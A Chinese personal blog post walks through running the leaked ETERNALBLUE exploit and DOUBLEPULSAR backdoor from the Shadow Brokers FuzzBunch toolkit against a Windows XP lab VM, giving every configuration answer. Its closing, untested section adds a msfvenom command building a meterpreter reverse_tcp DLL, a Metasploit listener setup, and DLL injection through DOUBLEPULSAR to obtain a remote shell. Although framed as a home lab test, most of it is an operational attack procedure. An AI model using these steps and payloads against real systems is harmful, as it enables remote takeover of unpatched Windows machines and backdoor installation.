FunnyWeb

据说这里有很多神奇的东西...

ETERNALBLUE工具验证

2017-04-16 00:04:33818 views

今天朋友圈里看到Shadow Brokers在搞大事情,爆出一份震惊世界的机密文档,其中包含了多个精美的 Windows 远程漏洞利用工具,据说是NSA使用的产品,忍不住要实践一波。

工具的github地址:

https://github.com/misterch0c/shadowbroker/

智商还是有点捉急,百度了一波教程。

本次使用虚拟机环境测试,32位Windows XP SP3

blob.png

首先安装python2.6(实测使用2.7会报错)和pywin32

python2.6_and_pywin32.rar

在环境变量PATH中添加python2.6

blob.png

解压工具包中的windows文件夹

在其中新建listeningposts文件夹

blob.png

执行python fb.py

blob.png

如果出现此界面即为启动成功。

目标IP填写本机地址

反弹IP也填写本机地址

是否重定向填写no

blob.png

日志目录不用改,直接回车默认即可

然后选择5 新建一个工程

blob.png

工程名称随意写,我写的fun

日志目录默认即可,直接回车

blob.png

输入命令 use 可以查看我们利用的exploit模块

blob.png

输入use eternalblue

变量设置默认yes 回车

网络超时默认60 回车

target ip不用改 回车

端口445不用改 回车

确认目标 回车

确认后门 回车

最大尝试次数默认3 回车

Groomallocations(实在没看懂这是什么)默认12 回车

目标系统选择  此处选择XP 输入0

blob.png

下面是传输方式,选择1

blob.png

下一步确认,输入yes

确认目标IP 回车

确认目标端口 回车

blob.png

确认设置,输入yes

仿佛要执行十几秒钟...可以看到成功...

blob.png

随后我们来检测下后门是否生成

输入use doublepulsar

提示变量设置,输入yes

blob.png

超时默认60 回车

目标IP默认 回车

目标端口默认445 回车

协议默认0 回车

目标系统架构,此处选择32位(x86),输入0

功能选择Ping(此处测试用) 输入1 

blob.png

确认IP 回车

确认端口 回车

确认执行插件 输入yes

blob.png

可以看到测试成功

blob.png

在功能处如果不选择ping,可以选择dll劫持,实现反弹shell。

以下步骤未测试

(在Linux下)

使用msf生成dll文件

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.47.128 LPORT=5555 -f dll > /opt/s.dll

在msf下开启msfpaylod监听:

use exploit/multi/handler

set lhost 192.168.47.128

set lport 5555

set PAYLOAD windows/x64/meterpreter/reverse_tcp

exploit

(上面的应该都要改成32位的x86)

(在windows下)

把生成的文件复制到攻击机中比如放在C盘根目录下s.dll

然后从use doublepulsar步骤开始

功能选择Rundll 输入2

输入复制来的dll路径 c:\\s.dll

然后一路确认和yes

执行成功之后就会在msf上看到反弹的shell